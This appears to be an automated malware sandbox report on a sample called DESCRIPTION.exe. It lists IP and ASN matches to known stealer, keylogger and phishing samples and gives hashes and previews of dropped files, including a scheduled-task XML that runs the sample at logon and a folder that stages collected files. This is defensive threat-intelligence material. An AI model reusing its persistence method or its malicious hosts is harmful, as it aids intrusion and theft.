                                          13:21:21Task SchedulerRun new task: OdoiXyuXnaQN path: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          149.154.167.220Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                            17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                              Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  https://savory-sweet-felidae-psrnd.glitch.me/Get hashmaliciousHTMLPhisherBrowse
                                                    QUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      Confirm Bank Statement.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                        q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                          TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            12.exeGet hashmaliciousUnknownBrowse
                                                              162.55.60.2PO.exeGet hashmaliciousDarkCloudBrowse
                                                              • showip.net/
                                                              UToB1WBfv0.exeGet hashmaliciousDarkCloudBrowse
                                                              • showip.net/
                                                              AGrsqxaSjd.exeGet hashmaliciousDarkCloudBrowse
                                                              • showip.net/
                                                              yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                              • showip.net/
                                                              oS6KsQIqJxe038Y.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                              • showip.net/
                                                              Purchase Order AB013058.PDF.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                              • showip.net/
                                                              MSM8C42iAN.exeGet hashmaliciousDarkCloudBrowse
                                                              • showip.net/
                                                              wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                              • showip.net/
                                                              8m65n7ieJC.exeGet hashmaliciousDarkCloudBrowse
                                                              • showip.net/
                                                              Factura modificada____678979879.exeGet hashmaliciousDarkCloudBrowse
                                                              • showip.net/

                                                              Domains

                                                              No context

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              TELEGRAMRUInquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                              • 149.154.167.220
                                                              17369284269327933f4ce2d9485e98192cffc35d127e85bf0db77dc37ba595305760e31611471.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                              • 149.154.167.220
                                                              Company introduction.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 149.154.167.220
                                                              rDEKONT-1_15_2025__75kb__pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              • 149.154.167.220
                                                              http://telenerh-ogjf.icu/Get hashmaliciousTelegram PhisherBrowse
                                                              • 149.154.167.99
                                                              http://telegroom-nzj.icu/Get hashmaliciousTelegram PhisherBrowse
                                                              • 149.154.167.99
                                                              https://ofmfy.icu/Get hashmaliciousUnknownBrowse
                                                              • 149.154.167.99
                                                              https://teiegtrm.cc/EN/Get hashmaliciousTelegram PhisherBrowse
                                                              • 149.154.167.99
                                                              https://teiegtrm.cc/apps.htmlGet hashmaliciousTelegram PhisherBrowse
                                                              • 149.154.167.99
                                                              https://teiegroj.cc/ZH/Get hashmaliciousTelegram PhisherBrowse
                                                              • 149.154.167.99
                                                              ACPCAScanned-IMGS_from NomanGroup IDT.scr.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.215.244
                                                              Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                                              • 162.0.209.157
                                                              elitebotnet.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 162.0.4.79
                                                              elitebotnet.mips.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 162.49.96.105
                                                              3.elfGet hashmaliciousUnknownBrowse
                                                              • 162.55.163.200
                                                              http://clumsy-sulky-helium.glitch.me/Get hashmaliciousUnknownBrowse
                                                              • 162.55.133.182
                                                              UWYXurYZ2x.exeGet hashmaliciousLummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty StealerBrowse
                                                              • 162.0.209.157
                                                              https://mrohailkhan.com/energyaustralia/auth/auhs1/Get hashmaliciousUnknownBrowse
                                                              • 162.0.209.189
                                                              n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.215.33
                                                              5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                              • 162.0.215.91

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DESCRIPTION.exe.log

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.34331486778365
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                              Malicious:true
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OdoiXyuXnaQN.exe.log

                                                              Download File
                                                              Process:C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1216
                                                              Entropy (8bit):5.34331486778365
                                                              Encrypted:false
                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):2232
                                                              Entropy (8bit):5.380805901110357
                                                              Encrypted:false
                                                              SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                                              MD5:16AD599332DD2FF94DA0787D71688B62
                                                              SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                                                              SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                                                              SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                                                              Malicious:false
                                                              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                              C:\Users\user\AppData\Local\Temp\A6a05708

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                              Category:dropped
                                                              Size (bytes):18283
                                                              Entropy (8bit):7.832215306379158
                                                              Encrypted:false
                                                              SSDEEP:384:WgjJAa4yPrPUUk9pNajE+lTE+ltuzxbuzxNNqN+nDnawV:WgjJAa4yjTaan3tuzpuzTnDnawV
                                                              MD5:04587AC403C3EF806A6F6DC8E0231D3D
                                                              SHA1:0F167CB0CD486EE61E85522D2B65A977B8D67250
                                                              SHA-256:D056BB9A957E6F9D3B39CABE8AE2B6FF7FE27701F57F91D2A54BC363EF60E369
                                                              SHA-512:11C0E277AAEE130D9C8E2957A286B5522114B606A60A3004A2A961C98701B6E591310BF1D1847C20F4B724FFB6EA0F4DC6E32654C9800026A3B4050C3F22623B
                                                              Malicious:false
                                                              Preview:PK..........EW..+.............Files/BNAGMGSPLO.xlsx..I.E!......%*......i7....,..+Nj.F).m...3...U\:@@..sp~$|.*.r.T.......R.2 ..dF..;..f...l..i.f.j.MC>..D.G_..j.7......t6[/........&.s;)@...9\YV.........R.1.....;.u..e...H..kD.#...S...:...v.F....#..g.+.1:..F..r.....~....[.P.h...U...%..r.(7.....G.`3}E]..+cu.s.\Z=....kW..+B..g.....T..1..+...K..X....7&..=.j..cYa...w.5........$]..u...{.%R]..V1........R..3..1h......{J=F.W.[.."..A)8>AZz>..X.S.V..~..h...v...f.L3(~......)zu:D....lC.....w..xO.mG.j..9.G..y2+V..U\..c.._.Z.4..q....LcU.."W.J..R?G.1..~..(5=.ZZxh...}.N..K..z..#....U.8.R....k..".e.p+\..a3x..rW.:.... ....k.W..|eMgQ.~..f..c'@z...h...j..K....n.....q.!.1....PK..........EWPN..............Files/BWETZDQDIB.pdf..K.E!.D.E.._Q.....0 .@.*..W.j..z..NG..(z...fz9=.i.u.!.AP....#.o].Vs.V.........RKr....GZ..W..l.r.W...=..<.9A..d.(.........},@~t..E..B.'........f......S..Y..9.h.t.S.......+....[./..........$y_.<..X=>y.xKu..#.i.3..@K.....6.tkQ.dR.(....

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40gew1a3.rqn.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dir4cg2z.vhp.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivrqnfnn.ckv.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phttjice.p0v.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkat2vzv.xyr.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1geocph.z5a.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfikfiwb.qkb.ps1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3kq2zsr.zwc.psm1

                                                              Download File
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\tmp9A10.tmp

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:XML 1.0 document, ASCII text
                                                              Category:dropped
                                                              Size (bytes):1585
                                                              Entropy (8bit):5.114443667342943
                                                              Encrypted:false
                                                              SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnmxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTnqv
                                                              MD5:188CBECAA91B2BDEB71D5DB56D545DF8
                                                              SHA1:62FAD2BD3C373623F6D08541BE052273E4D796BC
                                                              SHA-256:1ECC6454E334E12A10F5AF57D1FE21F53C76C96A1C997E31B5090D435CD410E6
                                                              SHA-512:6DFE21D55F4AEE9BFADC28E378ECB73612CAE310DFA90CABA9442C33AD0FC39A74DAB1E3CA1BE9BC07ACAE41B6FF8C0187DEA5885F6E3FD90817EA77B9EAA7A4
                                                              Malicious:true
                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                              C:\Users\user\AppData\Local\Temp\tmpAB27.tmp

                                                              Download File
                                                              Process:C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe
                                                              File Type:XML 1.0 document, ASCII text
                                                              Category:dropped
                                                              Size (bytes):1585
                                                              Entropy (8bit):5.114443667342943
                                                              Encrypted:false
                                                              SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnmxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTnqv
                                                              MD5:188CBECAA91B2BDEB71D5DB56D545DF8
                                                              SHA1:62FAD2BD3C373623F6D08541BE052273E4D796BC
                                                              SHA-256:1ECC6454E334E12A10F5AF57D1FE21F53C76C96A1C997E31B5090D435CD410E6
                                                              SHA-512:6DFE21D55F4AEE9BFADC28E378ECB73612CAE310DFA90CABA9442C33AD0FC39A74DAB1E3CA1BE9BC07ACAE41B6FF8C0187DEA5885F6E3FD90817EA77B9EAA7A4
                                                              Malicious:false
                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:Zip archive data (empty)
                                                              Category:dropped
                                                              Size (bytes):24
                                                              Entropy (8bit):1.4575187496394222
                                                              Encrypted:false
                                                              SSDEEP:3:pjt/lC:NtU
                                                              MD5:98A833E15D18697E8E56CDAFB0642647
                                                              SHA1:E5F94D969899646A3D4635F28A7CD9DD69705887
                                                              SHA-256:FF006C86B5EC033FE3CAFD759BF75BE00E50C375C75157E99C0C5D39C96A2A6C
                                                              SHA-512:C6F9A09D9707B770DBC10D47C4D9B949F4EBF5F030B5EF8C511B635C32D418AD25D72EEE5D7ED02A96AEB8BF2C85491CA1AA0E4336D242793C886ED1BCDD910B
                                                              Malicious:false
                                                              Preview:PK......................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files.zip~RF558918.TMP (copy)

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:Zip archive data (empty)
                                                              Category:dropped
                                                              Size (bytes):24
                                                              Entropy (8bit):1.4575187496394222
                                                              Encrypted:false
                                                              SSDEEP:3:pjt/lC:NtU
                                                              MD5:98A833E15D18697E8E56CDAFB0642647
                                                              SHA1:E5F94D969899646A3D4635F28A7CD9DD69705887
                                                              SHA-256:FF006C86B5EC033FE3CAFD759BF75BE00E50C375C75157E99C0C5D39C96A2A6C
                                                              SHA-512:C6F9A09D9707B770DBC10D47C4D9B949F4EBF5F030B5EF8C511B635C32D418AD25D72EEE5D7ED02A96AEB8BF2C85491CA1AA0E4336D242793C886ED1BCDD910B
                                                              Malicious:false
                                                              Preview:PK......................

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\BNAGMGSPLO.xlsx

                                                              Download File
                                                              Process:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):1026
                                                              Entropy (8bit):4.701704028955216
                                                              Encrypted:false
                                                              SSDEEP:24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
                                                              MD5:5F97B24D9F05FA0379F5E540DA8A05B0
                                                              SHA1:D4E1A893EFD370529484B46EE2F40595842C849E
                                                              SHA-256:58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
                                                              SHA-512:A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
                                                              Malicious:false
                                                              Preview:BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

